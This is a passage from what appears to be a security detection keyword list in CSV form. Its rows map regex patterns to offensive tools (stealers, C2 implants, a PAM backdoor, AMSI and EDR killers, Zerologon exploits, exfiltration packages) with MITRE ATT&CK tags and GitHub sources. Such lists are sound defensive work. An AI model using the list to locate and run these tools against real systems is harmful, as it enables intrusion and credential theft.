Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*ysoserial.sln*",".{0,1000}ysoserial\.sln.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*ytisf/PyExfil*",".{0,1000}ytisf\/PyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*yunuscadirci/CallStranger*",".{0,1000}yunuscadirci\/CallStranger.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","1","N/A","N/A","5","402","67","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" "*Yuuup!! Pass Cracked*",".{0,1000}Yuuup!!\sPass\sCracked.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*YwBhAGwAYwA=*",".{0,1000}YwBhAGwAYwA\=.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Z1P73136r4M(*",".{0,1000}Z1P73136r4M\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Z1P7H1N65(*",".{0,1000}Z1P7H1N65\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Z1PF01D3r(*",".{0,1000}Z1PF01D3r\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24*",".{0,1000}Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Z4nzu/hackingtool*",".{0,1000}Z4nzu\/hackingtool.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*zabbix_session_exp.py -*",".{0,1000}zabbix_session_exp\.py\s\-.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","0","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" "*zabbix_session_exp.py https*",".{0,1000}zabbix_session_exp\.py\shttps.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1505 - T1550 - T1574 - T1210 - T1110","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Fa1c0n35/zabbix-cve-2022-23131","1","0","N/A","N/A","1","1","0","2022-02-27T11:31:02Z","2022-02-27T11:30:53Z" "*zabbix_session_exp.py*",".{0,1000}zabbix_session_exp\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","149","45","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" "*ZAQwsxcde321*",".{0,1000}ZAQwsxcde321.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*zarp.py*",".{0,1000}zarp\.py.{0,1000}","offensive_tool_keyword","zarp","A network attack framework.","T1484 - T1498 - T1569","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hatRiot/zarp","1","0","N/A","N/A","10","1415","325","2023-05-01T20:18:05Z","2012-09-16T18:02:34Z" "*zblurx/certsync*",".{0,1000}zblurx\/certsync.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*zblurx/dploot*",".{0,1000}zblurx\/dploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*zcgonvh/DCOMPotato*",".{0,1000}zcgonvh\/DCOMPotato.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*zed2john.py*",".{0,1000}zed2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*zenoss_3x_command_execution*",".{0,1000}zenoss_3x_command_execution.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*zephrax/linux-pam-backdoor*",".{0,1000}zephrax\/linux\-pam\-backdoor.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","N/A","10","3","294","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z" "*ZephrFish/Stompy*",".{0,1000}ZephrFish\/Stompy.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*zer0condition/mhydeath*",".{0,1000}zer0condition\/mhydeath.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*zeroday-powershell*",".{0,1000}zeroday\-powershell.{0,1000}","offensive_tool_keyword","zeroday-powershell","This will exploit the Windows operating system allowing you to modify the file Some.dll.","T1203 - T1574.001 - T1546.011","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/OneLogicalMyth/zeroday-powershell","1","1","N/A","N/A","4","321","88","2018-09-12T09:03:04Z","2018-09-10T16:34:14Z" "*zerologon clone *https*",".{0,1000}zerologon\sclone\s.{0,1000}https.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*zerologon.py*",".{0,1000}zerologon\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1071","TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","1","N/A","N/A","1","10","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" "*zerologon.x64*",".{0,1000}zerologon\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","152","42","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*zerologon.x86*",".{0,1000}zerologon\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","152","42","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*zerologon_check*",".{0,1000}zerologon_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ZeroLogon-BOF*",".{0,1000}ZeroLogon\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","152","42","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*zerologon-restore * -target-ip *",".{0,1000}zerologon\-restore\s.{0,1000}\s\-target\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ZeroLogonScanner.*",".{0,1000}ZeroLogonScanner\..{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ZeroMemoryEx/Amsi-Killer*",".{0,1000}ZeroMemoryEx\/Amsi\-Killer.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*ZeroMemoryEx/Blackout*",".{0,1000}ZeroMemoryEx\/Blackout.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*ZEROSHELL | ZEROSTORE*",".{0,1000}ZEROSHELL\s\|\sZEROSTORE.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*zerosum0x0*",".{0,1000}zerosum0x0.{0,1000}","offensive_tool_keyword","zerosum0x0","github repo username hosting backdoors pocs and exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/zerosum0x0","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*zerosum0x0*koadic*",".{0,1000}zerosum0x0.{0,1000}koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*ZGF0YS5mZGEuZ292*",".{0,1000}ZGF0YS5mZGEuZ292.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*ZGIuc3NhLmdvdg==*",".{0,1000}ZGIuc3NhLmdvdg\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*zha0gongz1*",".{0,1000}zha0gongz1.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*zha0gongz1/DesertFox*",".{0,1000}zha0gongz1\/DesertFox.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*Ziconius/FudgeC2*",".{0,1000}Ziconius\/FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*ziiiiizzzb*",".{0,1000}ziiiiizzzb.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*ziiiiizzzib*",".{0,1000}ziiiiizzzib.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*zip2john *",".{0,1000}zip2john\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ZipExec/Cryptor*",".{0,1000}ZipExec\/Cryptor.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*ZipExec/Loader*",".{0,1000}ZipExec\/Loader.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","1","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*--ZipFileName $TrustedDomain.zip*",".{0,1000}\-\-ZipFileName\s\$TrustedDomain\.zip.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*zippy.nim*",".{0,1000}zippy\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Zloader-FCVP*",".{0,1000}Zloader\-FCVP.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access 